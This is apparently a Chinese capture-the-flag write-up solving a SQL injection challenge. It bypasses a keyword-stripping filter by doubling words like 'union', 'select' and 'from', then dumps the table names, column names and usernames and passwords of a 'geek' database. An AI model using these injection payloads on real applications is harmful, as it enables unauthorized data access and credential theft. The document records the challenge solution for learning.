尝试万能秘密1’ or 1=1#
发现or被过滤掉了,又试了一下其他的,得到select,and,union,from都被过滤掉了,查到replace函数替换,然后双写绕过查回显
' ununionion selselectect 1,2,3;#
接着查库名
' ununionion selselectect 1,2,3 frfromom asdf;#
得到库geek,然后查表名
1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
查b4bsql内容
1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
查内容(这里学到了group_concat(concat_ws(0x7e,1,2))可以连接显示1~2)
1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,id,username,passwoorrd)) frfromom geek.b4bsql#
得到flag